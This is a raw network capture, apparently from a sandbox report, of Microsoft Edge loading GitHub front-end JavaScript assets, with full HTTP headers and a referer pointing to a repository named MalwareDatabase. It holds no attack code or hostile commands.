last-modified: Tue, 24 Oct 2023 17:57:35 GMT
etag: 0x8DBD4BAB45BC855
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 29 Feb 2024 15:32:46 GMT
age: 4415755
x-served-by: cache-iad-kcgs7200091-IAD, cache-lcy-eglc8600045-LCY
x-cache: HIT, HIT
x-cache-hits: 2144, 99363
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 4bd1597afbb2bdb4c57aaf06fa325b8da6abbe2a
content-length: 4989
-
GEThttps://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_Box_Box_js-ebfceb11fb57.jsmsedge.exeRemote address:185.199.108.154:443RequestGET /assets/vendors-node_modules_primer_react_lib-esm_Box_Box_js-ebfceb11fb57.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Mon, 05 Feb 2024 14:26:30 GMT
etag: 0x8DC26567261863E
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 29 Feb 2024 15:32:46 GMT
age: 1753303
x-served-by: cache-iad-kcgs7200047-IAD, cache-lcy-eglc8600045-LCY
x-cache: HIT, HIT
x-cache-hits: 16, 388613
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 7dc923f7508084caa4908ac7fc656966efa6b28e
content-length: 157060
-
GEThttps://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_Button_Button_js-0528cb519251.jsmsedge.exeRemote address:185.199.108.154:443RequestGET /assets/vendors-node_modules_primer_react_lib-esm_Button_Button_js-0528cb519251.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Mon, 29 Jan 2024 05:04:29 GMT
etag: 0x8DC2087C6129A5E
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 29 Feb 2024 15:32:46 GMT
age: 2648717
x-served-by: cache-iad-kiad7000099-IAD, cache-lcy-eglc8600045-LCY
x-cache: HIT, HIT
x-cache-hits: 18, 77277
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 7eb7d8128892eae66a3fcb31ad48fcf5a8c902d1
content-length: 3742
-
GEThttps://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_ActionList_index_js-e001d0eead25.jsmsedge.exeRemote address:185.199.108.154:443RequestGET /assets/vendors-node_modules_primer_react_lib-esm_ActionList_index_js-e001d0eead25.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Mon, 29 Jan 2024 21:28:09 GMT
etag: 0x8DC211130AAFA62
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 29 Feb 2024 15:32:46 GMT
age: 2648717
x-served-by: cache-iad-kjyo7100115-IAD, cache-lcy-eglc8600045-LCY
x-cache: HIT, HIT
x-cache-hits: 18, 77986
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 73e5d03cde91049d4ba08cd124393ebbc78284a0
content-length: 12552
-
GEThttps://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_Overlay_Overlay_js-node_modules_primer_react_lib-es-fa1130-8d276499c3fb.jsmsedge.exeRemote address:185.199.108.154:443RequestGET /assets/vendors-node_modules_primer_react_lib-esm_Overlay_Overlay_js-node_modules_primer_react_lib-es-fa1130-8d276499c3fb.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Thu, 14 Dec 2023 19:10:52 GMT
etag: 0x8DBFCD8643758A0
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 29 Feb 2024 15:32:46 GMT
age: 4281319
x-served-by: cache-iad-kjyo7100021-IAD, cache-lcy-eglc8600045-LCY
x-cache: HIT, HIT
x-cache-hits: 155, 61222
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 309651e330d71064e8d450b1a9e36422700f98f9
content-length: 5074
-
GEThttps://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_Text_Text_js-node_modules_primer_react_lib-esm_Text-85a14b-249efa9c2fae.jsmsedge.exeRemote address:185.199.108.154:443RequestGET /assets/vendors-node_modules_primer_react_lib-esm_Text_Text_js-node_modules_primer_react_lib-esm_Text-85a14b-249efa9c2fae.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Wed, 24 Jan 2024 16:38:09 GMT
etag: 0x8DC1CFAD95E6A40
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 29 Feb 2024 15:32:46 GMT
age: 3008528
x-served-by: cache-iad-kcgs7200084-IAD, cache-lcy-eglc8600045-LCY
x-cache: HIT, HIT
x-cache-hits: 35, 62145
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 86b16fc75a55b6f7cfc4e1c5738c657e0bfaf8f4
content-length: 2693
-
GEThttps://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_ActionMenu_ActionMenu_js-a3c61ff6363e.jsmsedge.exeRemote address:185.199.108.154:443RequestGET /assets/vendors-node_modules_primer_react_lib-esm_ActionMenu_ActionMenu_js-a3c61ff6363e.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Wed, 06 Dec 2023 14:54:19 GMT
etag: 0x8DBF66B399A163D
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 29 Feb 2024 15:32:46 GMT
age: 4706768
x-served-by: cache-iad-kcgs7200045-IAD, cache-lcy-eglc8600045-LCY
x-cache: HIT, HIT
x-cache-hits: 134, 60725
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 315336034efe16483d858fc2fb995a211c664a83
content-length: 3542
-
GEThttps://github.githubassets.com/assets/vendors-node_modules_react-router-dom_dist_index_js-3b41341d50fe.jsmsedge.exeRemote address:185.199.108.154:443RequestGET /assets/vendors-node_modules_react-router-dom_dist_index_js-3b41341d50fe.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Thu, 14 Dec 2023 17:45:36 GMT
etag: 0x8DBFCCC7AFAE6D5
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 29 Feb 2024 15:32:46 GMT
age: 3791770
x-served-by: cache-iad-kcgs7200040-IAD, cache-lcy-eglc8600045-LCY
x-cache: HIT, HIT
x-cache-hits: 65, 61122
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: aa88c18ff98e7e5fad836f66a9027b81a33a58ee
content-length: 3645
-
GEThttps://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_Dialog_js-node_modules_primer_react_lib-esm_Label_L-857e1c-55e35df302fc.jsmsedge.exeRemote address:185.199.108.154:443RequestGET /assets/vendors-node_modules_primer_react_lib-esm_Dialog_js-node_modules_primer_react_lib-esm_Label_L-857e1c-55e35df302fc.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Tue, 23 Jan 2024 20:10:43 GMT
etag: 0x8DC1C4F6106EFDE
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 29 Feb 2024 15:32:46 GMT
age: 718803
x-served-by: cache-iad-kcgs7200154-IAD, cache-lcy-eglc8600045-LCY
x-cache: HIT, HIT
x-cache-hits: 6, 2853
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 6683a56ae142d96703624963663f9ef0f792bece
content-length: 5283
-
GEThttps://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_UnderlineNav_index_js-68debb3ba7c5.jsmsedge.exeRemote address:185.199.108.154:443RequestGET /assets/vendors-node_modules_primer_react_lib-esm_UnderlineNav_index_js-68debb3ba7c5.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Wed, 13 Dec 2023 14:54:32 GMT
etag: 0x8DBFBEB6AB1B520
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 29 Feb 2024 15:32:46 GMT
age: 4281312
x-served-by: cache-iad-kiad7000159-IAD, cache-lcy-eglc8600045-LCY
x-cache: HIT, HIT
x-cache-hits: 61, 34263
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 60d1c2101378c008287d68ab208bb24dedbe67f0
content-length: 3870
-
GEThttps://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_AvatarStack_AvatarStack_js-node_modules_primer_reac-e445e7-1d24d526a610.jsmsedge.exeRemote address:185.199.108.154:443RequestGET /assets/vendors-node_modules_primer_react_lib-esm_AvatarStack_AvatarStack_js-node_modules_primer_reac-e445e7-1d24d526a610.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Wed, 28 Feb 2024 21:27:04 GMT
etag: 0x8DC38A4029FD7A6
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 29 Feb 2024 15:32:46 GMT
age: 53518
x-served-by: cache-iad-kcgs7200149-IAD, cache-lcy-eglc8600045-LCY
x-cache: HIT, HIT
x-cache-hits: 34, 2520
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 63df24dcd7d4c04b7064ae2c4eb51e56e82fed14
content-length: 11435
-
GEThttps://github.githubassets.com/assets/ui_packages_react-core_create-browser-history_ts-ui_packages_react-core_AppContextProvider_ts-809ab9-bbdd92837dd6.jsmsedge.exeRemote address:185.199.108.154:443RequestGET /assets/ui_packages_react-core_create-browser-history_ts-ui_packages_react-core_AppContextProvider_ts-809ab9-bbdd92837dd6.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Wed, 28 Feb 2024 21:52:34 GMT
etag: 0x8DC38A792829DA5
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 29 Feb 2024 15:32:46 GMT
age: 53517
x-served-by: cache-iad-kcgs7200063-IAD, cache-lcy-eglc8600045-LCY
x-cache: HIT, HIT
x-cache-hits: 111, 4070
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 3a0c4cc5950b675fc31e10f811ea9ed9f1bd9f12
content-length: 4353
-
Remote address:185.199.108.154:443RequestGET /assets/ui_packages_paths_index_ts-c3cc12d2cf9c.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Wed, 28 Feb 2024 22:40:41 GMT
etag: 0x8DC38AE4B1B7837
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 29 Feb 2024 15:32:46 GMT
age: 56811
x-served-by: cache-iad-kcgs7200133-IAD, cache-lcy-eglc8600045-LCY
x-cache: HIT, HIT
x-cache-hits: 29, 2973
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 798845e89289023f3f3e8d35ba71fa8abea620d4
content-length: 29086
-
GEThttps://github.githubassets.com/assets/ui_packages_ref-selector_RefSelector_tsx-dbbdef4348e2.jsmsedge.exeRemote address:185.199.108.154:443RequestGET /assets/ui_packages_ref-selector_RefSelector_tsx-dbbdef4348e2.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Wed, 28 Feb 2024 21:52:33 GMT
etag: 0x8DC38A791F83D4D
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 29 Feb 2024 15:32:46 GMT
age: 53518
x-served-by: cache-iad-kiad7000109-IAD, cache-lcy-eglc8600045-LCY
x-cache: HIT, HIT
x-cache-hits: 35, 2519
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: bba572702cd83444bf4f5b47edf157a50a7e747e
content-length: 19671
-
GEThttps://github.githubassets.com/assets/ui_packages_commit-attribution_index_ts-ui_packages_commit-checks-status_index_ts-ui_packages-a73d65-1f7b49ebbee5.jsmsedge.exeRemote address:185.199.108.154:443RequestGET /assets/ui_packages_commit-attribution_index_ts-ui_packages_commit-checks-status_index_ts-ui_packages-a73d65-1f7b49ebbee5.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Tue, 27 Feb 2024 20:38:03 GMT
etag: 0x8DC37D3FEE0325A
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 29 Feb 2024 15:32:46 GMT
age: 85839
x-served-by: cache-iad-kcgs7200055-IAD, cache-lcy-eglc8600045-LCY
x-cache: HIT, HIT
x-cache-hits: 22, 4097
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 416bbbd26fe2928921f18069e1733f9dc614ffa1
content-length: 4263
-
GEThttps://github.githubassets.com/assets/app_assets_modules_react-code-view_components_directory_DirectoryContent_index_ts-app_assets_-36a91e-abc84050813d.jsmsedge.exeRemote address:185.199.108.154:443RequestGET /assets/app_assets_modules_react-code-view_components_directory_DirectoryContent_index_ts-app_assets_-36a91e-abc84050813d.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Fri, 23 Feb 2024 16:22:16 GMT
etag: 0x8DC348B9980FBA0
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 29 Feb 2024 15:32:46 GMT
age: 85839
x-served-by: cache-iad-kiad7000175-IAD, cache-lcy-eglc8600045-LCY
x-cache: HIT, HIT
x-cache-hits: 23, 4098
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: d26380f1279146cda7a638d5ddd3911b9a42e74b
content-length: 6677
-
Remote address:185.199.108.154:443RequestGET /assets/repos-overview-96a53de79471.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Wed, 28 Feb 2024 13:59:24 GMT
etag: 0x8DC3865786D31B5
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 29 Feb 2024 15:32:46 GMT
age: 85852
x-served-by: cache-iad-kjyo7100114-IAD, cache-lcy-eglc8600045-LCY
x-cache: HIT, HIT
x-cache-hits: 27, 6442
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 65156054b174a80d1821d322694e35fb1748162b
content-length: 2738
-
GEThttps://github.githubassets.com/assets/chunk-app_components_primer_experimental_toggle-switch-element_ts-7c5e7b04edd6.jsmsedge.exeRemote address:185.199.108.154:443RequestGET /assets/chunk-app_components_primer_experimental_toggle-switch-element_ts-7c5e7b04edd6.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Thu, 22 Feb 2024 16:53:09 GMT
etag: 0x8DC33C6BF8E4146
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 29 Feb 2024 15:32:46 GMT
age: 85851
x-served-by: cache-iad-kjyo7100077-IAD, cache-lcy-eglc8600045-LCY
x-cache: HIT, HIT
x-cache-hits: 31, 5958
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 1bb8ccfc812dc33a4fbb3db1272c30fde20ae128
content-length: 621
-
GEThttps://github.githubassets.com/assets/chunk-vendors-node_modules_github_hydro-analytics-client_dist_analytics-client_js-node_modules_gith-ffadee0-5cdb6954f6de.jsmsedge.exeRemote address:185.199.108.154:443RequestGET /assets/chunk-vendors-node_modules_github_hydro-analytics-client_dist_analytics-client_js-node_modules_gith-ffadee0-5cdb6954f6de.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Tue, 07 Nov 2023 20:10:43 GMT
etag: 0x8DBDFCD9F37E384
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 29 Feb 2024 15:32:46 GMT
age: 4706940
x-served-by: cache-iad-kcgs7200103-IAD, cache-lcy-eglc8600045-LCY
x-cache: HIT, HIT
x-cache-hits: 6, 82785
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 8c982aec268e4aa905589a2f890511fa7a7d6236
content-length: 3532
-
GEThttps://github.githubassets.com/assets/chunk-app_components_search_custom-scopes-element_ts-f5230254d82b.jsmsedge.exeRemote address:185.199.108.154:443RequestGET /assets/chunk-app_components_search_custom-scopes-element_ts-f5230254d82b.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Thu, 22 Feb 2024 16:53:09 GMT
etag: 0x8DC33C6BF8D3113
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
